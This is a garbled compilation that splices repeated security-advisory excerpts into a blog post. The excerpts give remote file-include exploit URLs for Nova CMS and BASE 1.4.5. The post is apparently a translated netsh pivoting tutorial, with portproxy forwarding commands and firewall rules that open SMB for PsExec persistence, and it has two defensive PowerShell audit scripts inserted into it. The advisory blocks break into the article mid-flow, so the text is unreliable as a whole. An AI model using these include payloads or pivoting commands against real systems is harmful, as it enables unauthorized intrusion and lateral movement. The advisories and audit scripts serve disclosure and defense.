http://www.example.com/novacms/optimizer/index.php?fileType=[EV!L] 
            
source: https://www.securityfocus.com/bid/51976/info
  
  
http://www.example.com/novacms/includes/function/gets.php?filename=[EV!L] 
            
source: https://www.securityfocus.com/bid/51976/info
   
   
http://www.example.com/novacms/includes/function/usertpl.php?conf[blockfile]=[EV!L] 
            
source: https://www.securityfocus.com/bid/51979/info


Function: include    File: base_db_setup.php            Line: 1
Exploit: http://www.example.com/base/base_db_setup.php?BASE_path=[EV!L]
            
source: https://www.securityfocus.com/bid/51979/info
 

Function: include_once    File: base_graph_common.php            Line: 1
Exploit: http://www.example.com/base/base_graph_common.php?BASE_path=[EV!L]
            
source: https://www.securityfocus.com/bid/51979/info
  
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
  
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
  
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include    File: base_graph_display.php            Line: 2
Exploit: http://www.example.com/base/base_graph_display.php?BASE_path=[EV!L]
            
source: https://www.securityfocus.com/bid/51979/info
     
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
     
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
     
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include_once    File: base_local_rules.php            Line: 1
Exploit: http://www.example.com/base/base_local_rules.php?BASE_path=[EV!L]
            
source: https://www.securityfocus.com/bid/51979/info
        
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
        
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
        
BASE 1.4.5 is vulnerable; other versions may be affected. 

Exploit: http://www.example.com/base/base_maintenance.php?BASE_path=[EV!L]
            
source: https://www.securityfocus.com/bid/51979/info
         
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
         
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
         
BASE 1.4.5 is vulnerable; other versions may be affected. 

Exploit: http://www.example.com/base/base_payload.php?BASE_path=[EV!L]
            

Netsh is a Windows utility that lets us do port forwarding very easily. Its advantage is that it ships with Windows by default; its disadvantage is that administrator privileges are required to use it (at least for port forwarding and firewall control).

Contents:

  • Introduction
  • Port forwarding with netsh
  • Firewall control with netsh

Introduction

The 3 commands we are going to use are the following:

  1. netsh interface portproxy add v4tov4 listenport=<puerto a escuchar> listenaddress=<direccion a escuchar> connectport=<puerto a conectar> connectaddress=<direccion a conectar>
  2. netsh interface portproxy show all
  3. netsh interface portproxy reset

The lab for this post is as follows:

  • 3 machines
    • Kali
      • IP: 192.168.10.10
    • Windows 7
      • IP: 192.168.10.40 and 192.168.20.40 -> 2 network interfaces
    • Debian -> web and SSH server, ports 22 and 80 enabled
      • IP: 192.168.20.20

Figure: netsh pivoting lab diagram

Port forwarding with netsh

On the Windows machine, with administrator privileges, we can inspect netsh's port forwarding table with the following command:

netsh interface portproxy show all


It prints nothing, so the table is empty. With the following command we set up port forwarding for whichever ports we want:

netsh interface portproxy add v4tov4 listenport=<puerto a escuchar> listenaddress=<direccion a escuchar> connectport=<puerto a conectar> connectaddress=<direccion a conectar>


The command takes 4 parameters, each of which does the following:

  • listenport -> the port on which Windows will listen; it acts as the tunnel entry point for the address and port we connect to.
  • listenaddress -> the network address on which the port given in listenport will listen. This determines the interface it listens on.
  • connectport -> the port on the address we want to reach.
  • connectaddress -> the address we want to reach.

As the screenshot showed, nothing appears at first: no error and no message saying that "something happened". However, if we now run the earlier command to view the netsh table:


We can see that what we specified in the commands above has been set. Note: as explained for the listenaddress parameter, it is important to choose the listening address correctly. If we specified 127.0.0.1, for example, the forwarded port would only be reachable from the Windows host itself. Specifying 192.168.10.40 instead (also one of the Windows IPs), the port is bound on the 192.168.10.0/24 interface and is therefore reachable by anyone with access to that network. We can also skip the choice altogether: if the listenaddress parameter is omitted, it listens on all interfaces:


With this, Windows is now forwarding the ports, so let's verify it from our Kali:


We see that both ports are tunnelled perfectly. It really is as simple as that. In addition, netsh stores the port forwarding configuration under the following registry key:

HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp


If we wanted to delete/reset the netsh table (the registry entries are removed as well), we could do so with the following command:

netsh interface portproxy reset


This removes any tunnelling we have set up, along with its registry entries.
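Because the portproxy table survives reboots through the registry key named above, a defender auditing a host wants to read that key directly rather than trust only the netsh listing. The following PowerShell script is an added example, not code from the original post: it enumerates the rules under HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, flags any rule whose listener is not restricted to loopback (the exposure the listenaddress discussion above describes), and cross-checks against `netsh interface portproxy show all`. It assumes that each rule is stored as a REG_SZ value named `<listenaddress>/<listenport>` whose data is `<connectaddress>/<connectport>`; verify that layout on your own build before relying on the parser.

```powershell
# Added example (not from the original post): audit netsh portproxy rules.
# Assumption, verify on your build: under the key below each rule is a REG_SZ value
# named "<listenaddress>/<listenport>" with data "<connectaddress>/<connectport>".
$PortProxyKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'

function Get-PortProxyRule {
    param([string]$Key = $PortProxyKey)
    # The key is only created once at least one rule has been added.
    if (-not (Test-Path -Path $Key)) { return @() }
    $item = Get-Item -Path $Key
    foreach ($valueName in $item.GetValueNames()) {
        $listen  = $valueName -split '/', 2
        $connect = ([string]$item.GetValue($valueName)) -split '/', 2
        [pscustomobject]@{
            ListenAddress  = $listen[0]
            ListenPort     = $listen[1]
            ConnectAddress = $connect[0]
            ConnectPort    = $connect[1]
        }
    }
}

$rules = @(Get-PortProxyRule)
if ($rules.Count -eq 0) {
    Write-Output 'No portproxy rules are defined in the registry.'
} else {
    $rules | Format-Table -AutoSize
    foreach ($r in $rules) {
        # Only 127.0.0.1 keeps the listener local to the host; a LAN address or a
        # wildcard exposes the tunnel to that network or to every interface.
        if ($r.ListenAddress -ne '127.0.0.1') {
            Write-Warning ("Rule {0}:{1} -> {2}:{3} is reachable from the network" -f $r.ListenAddress, $r.ListenPort, $r.ConnectAddress, $r.ConnectPort)
        }
    }
}

# Cross-check against netsh's own view; the two listings should agree.
netsh interface portproxy show all
```

Run it from an elevated prompt (the key lives under HKLM). Any rule the script reports that nobody in your team recognises is a candidate for `netsh interface portproxy reset`, which, as the post notes, clears both the table and the registry entries; an empty table but a populated key, or the reverse, means the IP Helper service (iphlpsvc, which implements portproxy) and the registry are out of sync and the host deserves a closer look.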

Firewall control with netsh

Another very useful aspect of netsh is that it lets us control the Windows firewall, adding rules so that, for example, a port that is only reachable internally becomes exposed externally. That is, suppose a machine had SMB reachable only internally (meaning the service is running, but only reachable locally; if it were not running at all this would be useless), and we had administrator credentials to use with PsExec. We could use netsh to expose the SMB port externally and thus obtain persistence with PsExec.

For this, the commands for adding rules are the following:

  • Inbound traffic:

netsh advfirewall firewall add rule name=<nombre de la regla> protocol=TCP dir=in localport=<puerto> action=allow


  • Outbound traffic:

netsh advfirewall firewall add rule name=<nombre de la regla> protocol=TCP dir=out localport=<puerto> action=allow


This way the port is now exposed externally. The firewall has many other options, but in practical terms, if we needed one for pivoting, it would be this one: the ability to expose internal ports externally.

As we have seen, netsh is a very convenient tool for pivoting because it ships with Windows by default. The only requirement, as already mentioned, is having Administrator privileges.
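The firewall side of the technique leaves an equally visible trace: an inbound allow rule on a port such as SMB that nobody provisioned. The script below is an added example, not code from the original post, written from the defender's side: it lists enabled inbound allow rules for a constructed watch list of TCP ports (445 for the PsExec case above, plus RDP and WinRM), flags those without a rule group (rules created with `netsh advfirewall firewall add rule` carry only the name given on the command line, whereas Windows' built-in rules belong to a group; treat this as a heuristic, not proof), and shows the counterpart of the add commands for removing a rule. It uses the NetSecurity cmdlets that ship with Windows 8 / Server 2012 and later; the watch list and the heuristic are this example's assumptions.

```powershell
# Added example (not from the original post): audit inbound "allow" rules on
# ports that a netsh-based pivot would expose, and show how to remove one.
# Watch list is constructed for the example; adapt it to your environment.
$WatchPorts = @('445', '3389', '5985')

function Get-InboundAllowRule {
    param([string[]]$Ports)
    Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True | ForEach-Object {
        $rule   = $_
        $filter = $rule | Get-NetFirewallPortFilter
        # LocalPort may be one port, a list, a range such as "1-1024", or "Any".
        # Only exact single ports are matched here; review ranges and "Any" separately.
        foreach ($port in @($filter.LocalPort)) {
            if ($filter.Protocol -eq 'TCP' -and $Ports -contains $port) {
                [pscustomobject]@{
                    Name        = $rule.Name
                    DisplayName = $rule.DisplayName
                    Port        = $port
                    Profile     = $rule.Profile
                    Group       = $rule.Group
                }
            }
        }
    }
}

$suspects = @(Get-InboundAllowRule -Ports $WatchPorts)
$suspects | Format-Table -AutoSize

# Heuristic (assumption): rules added via "netsh advfirewall firewall add rule" have
# no Group, while built-in rules such as "File and Printer Sharing" do.
$suspects | Where-Object { [string]::IsNullOrEmpty($_.Group) } | ForEach-Object {
    Write-Warning ("Inbound allow rule '{0}' on TCP {1} has no rule group; verify who created it" -f $_.DisplayName, $_.Port)
}

# Removing an unwanted rule, the counterpart of the "add rule" commands above:
#   netsh advfirewall firewall delete rule name="<rule name>"
# or with the same module:
#   Remove-NetFirewallRule -DisplayName "<rule name>"
```

Run it elevated. Pair its output with the portproxy audit from the previous section: an inbound allow rule on a high port together with a portproxy listener on that same port is exactly the footprint the two netsh commands in this post produce.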

source: https://www.securityfocus.com/bid/51979/info
      
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
      
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
      
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include_once    File: base_logout.php            Line: 1
Exploit: http://www.example.com/base/base_logout.php?BASE_path=[EV!L]
            
source: https://www.securityfocus.com/bid/51979/info
    
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
    
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
    
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include    File: base_graph_main.php            Line: 1
Exploit: http://www.example.com/base/base_graph_main.php?BASE_path=[EV!L]
            
source: https://www.securityfocus.com/bid/51976/info

Nova CMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow a remote attacker to obtain sensitive information or execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. 

http://www.example.com/novacms/administrator/modules/moduleslist.php?id=[EV!L] 
            
source: https://www.securityfocus.com/bid/51979/info
       
BASE is prone to a security-bypass vulnerability and multiple remote file-include vulnerabilities.
       
An attacker can exploit these issues to gain unauthorized access, obtain potentially sensitive information, or execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
       
BASE 1.4.5 is vulnerable; other versions may be affected. 

Function: include    File: base_main.php            Line: 15
Exploit: http://www.example.com/base/base_main.php?BASE_path=[EV!L]